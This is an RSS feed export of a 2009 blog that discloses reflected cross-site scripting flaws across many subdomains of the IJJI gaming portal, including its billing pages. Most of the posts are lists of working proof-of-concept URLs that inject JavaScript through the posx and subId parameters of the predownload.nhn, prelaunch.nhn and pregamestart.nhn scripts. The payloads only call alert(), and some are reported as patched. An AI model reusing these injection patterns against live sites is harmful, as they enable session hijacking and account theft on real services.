<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>IJJI XSS</title>
	<atom:link href="http://ijjixss.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://ijjixss.wordpress.com</link>
	<description>An attempt to publish the vulnerabilities in the IJJI website</description>
	<lastBuildDate>Tue, 15 Sep 2009 23:21:30 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='ijjixss.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>IJJI XSS</title>
		<link>http://ijjixss.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://ijjixss.wordpress.com/osd.xml" title="IJJI XSS" />
	<atom:link rel='hub' href='http://ijjixss.wordpress.com/?pushpress=hub'/>
		<item>
		<title>One Month Later..</title>
		<link>http://ijjixss.wordpress.com/2009/09/15/one-month-later/</link>
		<comments>http://ijjixss.wordpress.com/2009/09/15/one-month-later/#comments</comments>
		<pubDate>Tue, 15 Sep 2009 23:18:41 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=140</guid>
		<description><![CDATA[It&#8217;s been a month since I published my last vulnerability, and IJJI has made several positive changes to their code (specifically with callback scripts). The following posts have been patched due correctly encoding brackets, quotes, or blacklisting non-alphanumeric characters: Global Pre-Download [BONUS2] Global Pre-Download [BONUS] Login Next URL JSON Info Callback BBS Forum View Lunia [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=140&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been a month since I published my <a href="http://ijjixss.wordpress.com/2009/08/15/global-pre-download-bonus2/" target="_blank">last vulnerability</a>, and IJJI has made several positive changes to their code (specifically with callback scripts).</p>
<p>The following posts have been patched due correctly encoding brackets, quotes, or blacklisting non-alphanumeric characters:</p>
<ul>
<li><a href="http://ijjixss.wordpress.com/2009/08/15/global-pre-download-bonus2/" target="_blank">Global Pre-Download [BONUS2]</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/08/14/global-pre-download-bonus/" target="_blank">Global Pre-Download [BONUS]</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/08/11/login-next-url/" target="_blank">Login Next URL</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/08/02/json-info-callback/" target="_blank">JSON Info Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/08/09/bbs-forum-view/" target="_blank">BBS Forum View</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/08/05/lunia-poll-callback/" target="_blank">Lunia Poll Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/07/29/json-last-login-callback-bonus/" target="_blank">JSON Last Login Callback [BONUS]</a> (still works on <em>gunz.ijji.com</em> though..)</li>
<li><a href="http://ijjixss.wordpress.com/2009/07/26/gunz-poll-callback/" target="_blank">Gunz Poll Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/07/25/huxley-poll-callback/" target="_blank">Huxley Poll Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/07/24/crm-check-callback/" target="_blank">CRM Check Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/07/23/drift-city-poll-callback/" target="_blank">Drift City Poll Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/07/22/json-balance-callback/" target="_blank">JSON Balance Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/07/20/json-gem-callback/" target="_blank">JSON Gem Callback</a></li>
<li><a href="http://ijjixss.wordpress.com/2009/07/19/json-buddy-callback/" target="_blank">JSON Buddy Callback</a></li>
</ul>
<p>The following post has been patched thanks to the use of the <em>isNaN</em> function over <em>eval</em>:</p>
<ul>
<li><a href="http://ijjixss.wordpress.com/2009/07/30/bbs-board-view/" target="_blank">BBS Board View</a></li>
</ul>
<p>The following posts have been updated:</p>
<ul>
<li><a href="http://ijjixss.wordpress.com/2009/07/16/signup-referral/" target="_blank">Signup Referral</a></li>
</ul>
<p><em>Updated the src attribute to call the event onError in Firefox 3.5.<br />
</em></p>
<ul>
<li><a href="http://ijjixss.wordpress.com/2009/07/28/bbs-editor/" target="_blank">BBS Editor</a></li>
</ul>
<p><em>Updated without the use of quotes.</em></p>
<p>IJJI has now published <a href="http://holybeast.ijji.com/" target="_blank">Holybeast Online</a>, and begun the open-beta for <a href="http://sun.ijji.com/" target="_blank">Soul of the Ultimate Nation</a> (S.U.N). They&#8217;ve also pushed their new launcher, <a href="http://reactor.ijji.com/" target="_blank">Reactor</a>, an extended web-wrapper for organising installed games. <a href="http://store.steampowered.com/about/" target="_blank">Steam</a> anyone?</p>
<p>I&#8217;ve updated the categories for now, but I shall expect them to be outdated as this blog becomes forgotten about.</p>
<p>Oh, one last thing: <a href="http://reactor.ijji.com/common/pregamestart.nhn?posx=0;}alert%28/xss/.source%29;function%20init%28%29{return" target="_blank">Pre-Game Start</a> <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/140/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=140&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/09/15/one-month-later/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>Global Pre-Download [BONUS2]</title>
		<link>http://ijjixss.wordpress.com/2009/08/15/global-pre-download-bonus2/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/15/global-pre-download-bonus2/#comments</comments>
		<pubDate>Sat, 15 Aug 2009 00:36:44 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[patched]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=138</guid>
		<description><![CDATA[Type: Non-persistent Criteria: None This final disclosure draws the series of predownload.nhn vulnerabilities to a close. An actual explaination is due at a later date, where I will wrap this this blog up and open to feedback. 10) Miscellaneous http://misc.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 11) Bulletin Board System http://bbs.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 12) Channel http://channel.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 13) Billing http://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 14) HTTPS Billing https://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=138&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>None</strong></p>
<p>This final disclosure draws the <a href="http://ijjixss.wordpress.com/2009/08/14/global-pre-download-bonus/" target="_blank">series</a> of <em>predownload.nhn</em> vulnerabilities to a close.</p>
<p>An actual explaination is due at a later date, where I will wrap this this blog up and open to feedback.</p>
<p><strong>10) Miscellaneous</strong></p>
<p style="text-align:center;"><em>http://misc.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>11) Bulletin Board System</strong></p>
<p style="text-align:center;"><em>http://bbs.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>12) Channel</strong></p>
<p style="text-align:center;"><em>http://channel.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>13) Billing</strong></p>
<p style="text-align:center;"><em>http://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>14) HTTPS Billing</strong></p>
<p style="text-align:center;"><em>https://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>15) Facebook</strong></p>
<p style="text-align:center;"><em>http://facebook.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>16) Message</strong></p>
<p style="text-align:center;"><em>http://message.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>17) Avatar</strong></p>
<p style="text-align:center;"><em>http://avatar.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/138/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=138&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/15/global-pre-download-bonus2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>Global Pre-Download [BONUS]</title>
		<link>http://ijjixss.wordpress.com/2009/08/14/global-pre-download-bonus/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/14/global-pre-download-bonus/#comments</comments>
		<pubDate>Fri, 14 Aug 2009 23:55:34 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[patched]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=136</guid>
		<description><![CDATA[Type: Non-persistent Criteria: None The penultimate post in this experimental blog, disclosing 9 seperate vulnerabilities in predownload.nhn &#8211; a script which only appeared with Huxley. 1) Top-level http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 2) www2 http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 3) Huxley:The Dystopia http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 4) Soldier Front http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 5) GunZ http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 6) Drift City http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 7) Lunia http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 8) Game http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return 9) Events http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=136&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>None</strong></p>
<p>The penultimate post in this experimental blog, disclosing 9 seperate vulnerabilities in <em>predownload.nhn</em> &#8211; a script which only appeared with <a href="http://huxley.ijji.com/" target="_blank">Huxley</a>.</p>
<p><strong>1) Top-level</strong></p>
<p style="text-align:center;"><em>http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>2) www2</strong></p>
<p style="text-align:center;"><em>http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>3) Huxley:The Dystopia</strong></p>
<p style="text-align:center;"><em>http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>4) Soldier Front</strong></p>
<p style="text-align:center;"><em>http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>5) GunZ</strong></p>
<p style="text-align:center;"><em>http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>6) Drift City</strong></p>
<p style="text-align:center;"><em>http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>7) Lunia</strong></p>
<p style="text-align:center;"><em>http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>8</strong><strong>) Game</strong></p>
<p style="text-align:center;"><em>http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p><strong>9) Events</strong></p>
<p style="text-align:center;"><em>http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return</em></p>
<p>This script has a greater advantage over <em>prelogin.nhn</em> in that it won&#8217;t redirect to login or alert if the plugin is installed.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/136/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=136&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/14/global-pre-download-bonus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>Global Pre-Launch [BONUS2]</title>
		<link>http://ijjixss.wordpress.com/2009/08/13/global-pre-launch-bonus2/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/13/global-pre-launch-bonus2/#comments</comments>
		<pubDate>Thu, 13 Aug 2009 00:36:14 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[non-persistent]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=132</guid>
		<description><![CDATA[Type: Non-persistent Criteria: None This post is a continuation of the disclosure of prelaunch.nhn script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more; totalling 17 copies of the same script. 10) Miscellaneous http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;// 11) Bulletin Board System http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;// 12) Channel http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;// 13) Billing http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;// 14) HTTPS Billing https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;// 15) [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=132&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>None</strong></p>
<p>This post is a <a href="http://ijjixss.wordpress.com/2009/08/12/global-pre-launch-bonus/" target="_blank">continuation</a> of the disclosure of <em>prelaunch.nhn</em> script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more; totalling 17 copies of the same script.</p>
<p><strong>10) Miscellaneous</strong></p>
<p style="text-align:center;"><em>http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>11) Bulletin Board System</strong></p>
<p style="text-align:center;"><em>http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>12) Channel</strong></p>
<p style="text-align:center;"><em>http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>13) Billing</strong></p>
<p style="text-align:center;"><em>http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>14) HTTPS Billing</strong></p>
<p style="text-align:center;"><em>https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>15) Facebook</strong></p>
<p style="text-align:center;"><em>http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>16) Message</strong></p>
<p style="text-align:center;"><em>http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>17) Avatar</strong></p>
<p style="text-align:center;"><em>http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p>It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:</p>
<p>If the user <strong>is authenticated</strong>, they will be alerted:</p>
<p style="text-align:center;"><code>This channel does not exist</code></p>
<p style="text-align:left;">If the user is <strong>not authenticated</strong>, then they will be redirected to login (there is a timed delay on with Firefox).</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/132/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/132/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/132/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=132&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/13/global-pre-launch-bonus2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>Global Pre-Launch [BONUS]</title>
		<link>http://ijjixss.wordpress.com/2009/08/12/global-pre-launch-bonus/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/12/global-pre-launch-bonus/#comments</comments>
		<pubDate>Wed, 12 Aug 2009 23:58:04 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[non-persistent]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=128</guid>
		<description><![CDATA[Type: Non-persistent Criteria: None Thus begins the final 4 days of this experiment; hopefully ending with a bang. This post will disclose 9 seperate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins to launch one of the many games offered on the IJJI service. 1) Top-level http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;// 2) www2 http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;// 3) [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=128&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>None</strong></p>
<p>Thus begins the final 4 days of this experiment; hopefully ending with a bang.</p>
<p>This post will disclose 9 <a href="http://ijjixss.wordpress.com/2009/08/10/blog-status/" target="_blank">seperate vulnerabilities</a> in the <em>prelaunch.nhn</em> script used to communicate with the various plugins to launch one of the many games offered on the IJJI service.</p>
<p><strong>1) Top-level</strong></p>
<p style="text-align:center;"><em>http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>2) www2</strong></p>
<p style="text-align:center;"><em>http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>3) Huxley:The Dystopia</strong></p>
<p style="text-align:center;"><em>http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>4) Soldier Front</strong></p>
<p style="text-align:center;"><em>http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>5) GunZ</strong></p>
<p style="text-align:center;"><em>http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>6) Drift City</strong></p>
<p style="text-align:center;"><em>http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>7) Lunia</strong></p>
<p style="text-align:center;"><em>http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>8</strong><strong>) Game</strong></p>
<p style="text-align:center;"><em>http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p><strong>9) Events</strong></p>
<p style="text-align:center;"><em>http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//</em></p>
<p>They clearly all exploit the same parameter, as they share the same script. I plan to writeup better descriptions in a seperate post.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/128/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=128&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/12/global-pre-launch-bonus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>Login Next URL</title>
